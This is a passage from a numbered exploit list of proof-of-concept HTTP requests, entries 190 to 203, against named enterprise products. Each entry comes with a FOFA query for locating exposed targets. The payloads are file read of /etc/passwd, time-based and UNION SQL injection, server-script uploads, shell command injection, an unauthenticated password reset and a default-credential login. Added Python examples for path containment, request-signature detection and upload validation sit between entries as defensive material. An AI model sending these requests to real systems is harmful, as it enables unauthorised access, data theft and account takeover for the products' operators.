Accept-Language: zh-CN,zh;q=0.9
Connection: close

The payload is a stacked query (WAITFOR DELAY), i.e. the backend is Microsoft SQL Server.

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

Note the value is a file:// URL rather than a bare path: the parameter is evidently handed to an API that resolves URLs.

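Entries 188 and 190 both work because the endpoint passes a user-controlled value straight to a file API (a bare path in one case, a file:// URL in the other). The following is an added example, not code from this list or from either vendor, of the containment check a download endpoint should apply before opening anything: decode, refuse URL schemes and absolute paths, then resolve the candidate and confirm it is still under the base directory. BASE_DIR, resolve_download, is_safe and the sample values are assumptions made for the demonstration.

```python
import os
from urllib.parse import unquote, urlsplit

# Assumed location of the attachment store for this demonstration.
BASE_DIR = "/srv/attachments"


class UnsafePath(ValueError):
    """The user-supplied reference would leave the attachment store."""


def resolve_download(base_dir: str, user_value: str) -> str:
    """Map a user-supplied file reference (the file= or poi= value above)
    onto a real path under base_dir, or raise UnsafePath.

    Order matters: decode first, then reject schemes and absolute paths,
    then resolve and check containment. Checking containment on the raw
    string would miss encoded separators and symlinks.
    """
    # Decode twice so %252e%252e (double-encoded "..") is seen as "..".
    decoded = unquote(unquote(user_value))
    if "\x00" in decoded:
        raise UnsafePath("NUL byte in path")
    # file:///etc/passwd, php://filter, http://... : some file APIs (Java
    # URL.openStream, PHP fopen wrappers) open these as resources, not names.
    # Side effect: a plain name containing ':' is rejected as well.
    if urlsplit(decoded).scheme:
        raise UnsafePath(f"URL scheme not allowed: {user_value!r}")
    if os.path.isabs(decoded) or decoded.startswith(("\\", "//")):
        raise UnsafePath(f"absolute path not allowed: {user_value!r}")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, decoded))
    # commonpath is the real containment test; a plain startswith() check
    # would accept /srv/attachments2/x as being under /srv/attachments.
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafePath(f"path escapes {base_dir}: {user_value!r}")
    return candidate


def is_safe(base_dir: str, user_value: str) -> bool:
    """True if the reference would be served, False if it is refused."""
    try:
        resolve_download(base_dir, user_value)
        return True
    except UnsafePath:
        return False


# Constructed inputs: the two POC values above plus encoded variants and
# two legitimate references. True means the reference would be served.
SAMPLES = {
    "/etc/passwd": False,                        # entry 188
    "file:///etc/passwd": False,                 # entry 190
    "..%2F..%2F..%2Fetc%2Fpasswd": False,        # percent-encoded traversal
    "%252e%252e/%252e%252e/etc/passwd": False,   # double-encoded traversal
    "reports/q1.pdf": True,
    "reports/../reports/q2.pdf": True,           # still inside after resolving
}


def demo(base_dir: str = BASE_DIR) -> dict:
    """Return {reference: served?} for every sample."""
    return {value: is_safe(base_dir, value) for value in SAMPLES}


if __name__ == "__main__":
    for value, served in demo().items():
        print(f"{'SERVE ' if served else 'REJECT'} {value}")
```

A string-prefix check on the raw parameter is the usual wrong fix: it misses percent-encoded separators, double encoding and symlinks inside the store, which is why this version decodes first and compares resolved paths with commonpath.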
191. 亿赛通电子文档安全管理系统 (ESAFENET CDG) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

Note the /js/../ segment in the request path; the POC relies on it to reach NavigationAjax.

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The file extension is taken from the name query parameter (name=.ashx) and the raw request body is stored as the file content, so the body is a complete ASP.NET handler:
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: obtain a CSRF token. The POC supplies an arbitrary PHPSESSID and reuses the same value in step 2:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: the param value is evaluated as Python. The POC writes a marker file under the web root (token_csrf is the value returned in step 1):
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back:
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE business operations platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present. The filename field carries a traversal sequence that drops the JSP into the deployed fe.war:

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 (Volans internet behaviour management) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
The request carries no session or credential; xgh is the target account identifier and newPass the password to set:
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 (Entsoft CRM) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

Note the ;.js suffix on the servlet path; the POC relies on it to reach the action.

198. 阿里云盘 (Aliyun Drive) WebDAV LuCI app command injection
CVE-2024-29640
Authenticated (a valid sysauth cookie is required). The sid value percent-decodes to `ls />/www/aaa.txt` in backticks, i.e. command substitution:
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
Authenticated: the POC logs in with the default admin/admin credentials. Three steps: fetch the csfr token, exchange it plus the credentials for a session cookie, then upload.

1. Fetch the csfr token from the login page:
GET /auth/login?to=/ HTTP/1.1

Response: 200, the body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from step 1 to obtain a session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

The file is then reachable at:
/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 (Founder omnimedia news editing system) binary.do SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

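Most of the injection payloads in this list (the RANDOMBLOB heavy query above 187, SLEEP in 187 and 200, WAITFOR DELAY in 189, 191 and 201, UNION SELECT in 197 and 201, the shell metacharacters in 195 and 198, and os.system in 193) are visible in the request itself once it is percent-decoded, so a defender with full-request logs (WAF, reverse proxy or application log) can search for them directly. The following is an added example, not code from this list or from any of the vendors, of such a triage pass: it normalises each request (double percent-decode, plus-to-space, lowercase) and reports which signature families are present. The signature names, the SAMPLE_REQUESTS reduced from the POCs and the benign control request are all constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Signature table: alert name -> pattern run over the normalised request text.
# Each pattern corresponds to a payload shape that appears in this list.
SIGNATURES = {
    "mysql_sleep": re.compile(r"\bsleep\s*\(\s*\d"),               # SLEEP(5): 187, 200
    "mssql_waitfor": re.compile(r"\bwaitfor\s+delay\b"),            # 189, 191, 201
    "sqlite_heavy_query": re.compile(r"\brandomblob\s*\("),         # RANDOMBLOB above 187
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),   # 197, 201
    # shell metacharacter followed by a common recon command: 195 (;uname), 198 (`ls)
    "shell_metachar": re.compile(
        r"(?:;|\||`|\$\()\s*(?:uname|id|whoami|cat|ls|wget|curl|nc)(?![\w=])"),
    "python_os_system": re.compile(r"\bos\.system\s*\("),           # 193
}


def normalise(text: str) -> str:
    """Percent-decode twice (defeats double encoding), map '+' to space as
    form encoding does, and lowercase so the patterns can stay simple."""
    return unquote_plus(unquote_plus(text)).lower()


def match_signatures(target: str, body: str = "") -> set:
    """Return the names of every signature present in the request target
    (path plus query) or body. The same payload is as bad in a GET query
    as in a POST body, so both are searched together."""
    haystack = normalise(target) + "\n" + normalise(body)
    return {name for name, pattern in SIGNATURES.items() if pattern.search(haystack)}


# Constructed requests reduced from the POCs in this list; not captured traffic.
# Tuples are (name, target, body).
SAMPLE_REQUESTS = [
    ("sqlite_heavy_186", "/",
     "req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450"),
    ("mura_187", "/index.cfm/_api/json/v1/default/?method=processAsyncObject",
     "object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1"),
    ("lanwon_189", "/xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27--", ""),
    ("hillstone_193", "/master/ajaxActions/setSystemTimeAction.php?token_csrf=abc",
     "param=os.system('id')"),
    ("volans_195", "/send_order.cgi?parameter=operation",
     '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}'),
    ("entsoft_197", "/entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist", ""),
    ("aliyundrive_198", "/cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20", ""),
    ("seacms_200", "/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list", ""),
    ("founder_201", "/newsedit/newsplan/task/binary.do",
     "TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1"),
    ("benign_search", "/search?q=sleep+apnea+clinic&page=1", ""),
]


def triage(requests=SAMPLE_REQUESTS) -> dict:
    """Return {request name: set of matched signature names}."""
    return {name: match_signatures(target, body) for name, target, body in requests}


if __name__ == "__main__":
    for name, hits in triage().items():
        print(f"{name:20s} {sorted(hits) or '-'}")
```

Time-based payloads are easy to spot in the request but leave no error in application logs, so pair this with response-time outliers on the same endpoints; and treat the shell_metachar family as a triage hint rather than a verdict, since semicolons and backticks do occur in legitimate parameters.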
202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
First fetch the page to obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Then substitute those values into the upload request (the bttnUpload field carries the button's label 上传图片, "upload image"):
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The file is then reachable at:
/_data/Uploads/1123.txt

203. 红海云EHR (Redsea EHR) PtFjk file upload
FOFA:body="RedseaPlatform"
The part is labelled image/jpeg but carries JSP source:
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

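The upload entries (192, 194, 199, 202, 203) share one root cause: the server trusts what the client sends as the file name, the extension or the Content-Type. 192 takes the extension from the name query parameter, 194 accepts ../ in the filename and writes a JSP into the deployed WAR, 199 and 203 ship scripts labelled text/php and image/jpeg. The following is an added example, not code from this list or from any vendor, of the server-side checks that close those paths: strip path components, refuse executable extensions anywhere in the name, allowlist the final extension, compare the first bytes with the expected magic number, and generate the storage name on the server. validate_upload, storage_name and SAMPLES are assumptions made for the demonstration.

```python
import os
import secrets

# Extensions the store is willing to keep. Everything else is refused.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "docx", "xlsx"}
# Extensions a web container will execute or unpack. They are refused wherever
# they occur in the name (shell.jsp.jpg too), because servers differ on which
# dot they map a handler on.
EXEC_EXT = {"jsp", "jspx", "php", "phtml", "php5", "asp", "aspx", "ashx",
            "asmx", "cfm", "cfc", "jar", "war"}
# Leading bytes expected for types that have a magic number.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",), "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
SCRIPT_MARKERS = (b"<%", b"<?php", b"<?=", b"<script", b"#!")


def validate_upload(filename: str, head: bytes) -> tuple:
    """Return (accepted, reason) for one multipart file part.

    filename is the client's filename= value and head the first bytes of the
    part body. The client's Content-Type header is deliberately not a
    parameter: entries 203 (image/jpeg on a .jsp) and 199 (text/php) show it
    is whatever the sender chooses, so it is never consulted.
    """
    if "\x00" in filename:
        return False, "NUL byte in filename"
    if filename != os.path.basename(filename) or "\\" in filename or ".." in filename:
        return False, "path components in filename"
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing extension"
    if EXEC_EXT.intersection(parts[1:]):
        return False, "executable extension"
    ext = parts[-1]
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not in allowlist"
    if ext in MAGIC and not head.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if head.lstrip().startswith(SCRIPT_MARKERS):
        return False, "content looks like server-side script"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Name to store the file under: random and server-chosen, never derived
    from a request parameter (entry 192 takes the extension from ?name=)."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed parts reduced from the upload POCs above, plus two legitimate
# files and two evasion attempts.
SAMPLES = [
    ("hello.jsp", b'<% out.println("hello");%>'),                                   # 194 content
    ("../../../../../jboss/web/fe.war/hello.jsp", b'<% out.println("hello");%>'),   # 194 name
    ("tttt.php", b'<?php echo "tttt";unlink(__FILE__);?>'),                          # 199
    ("11.jsp", b'<% out.print("hello,eHR");%>'),                                      # 203
    ("shell.jsp.jpg", b"\xff\xd8\xff\xe0"),                                           # double extension
    ("report.jpg", b'<?php system($_GET["c"]); ?>'),                                # script, image name
    ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("1123.txt", b"Hello World!"),                                                    # 202
]


def demo() -> dict:
    """Return {filename: accepted?} for every sample."""
    return {name: validate_upload(name, head)[0] for name, head in SAMPLES}


if __name__ == "__main__":
    for name, head in SAMPLES:
        ok, reason = validate_upload(name, head)
        print(f"{'ACCEPT' if ok else 'REJECT'} {name!r}: {reason}")
```

The directory that receives uploads must also be served without script execution (no JSP/PHP/ASPX handler mapped there), so that a validator bypass yields a download rather than a shell; the checks above shrink the attack surface but do not replace that configuration.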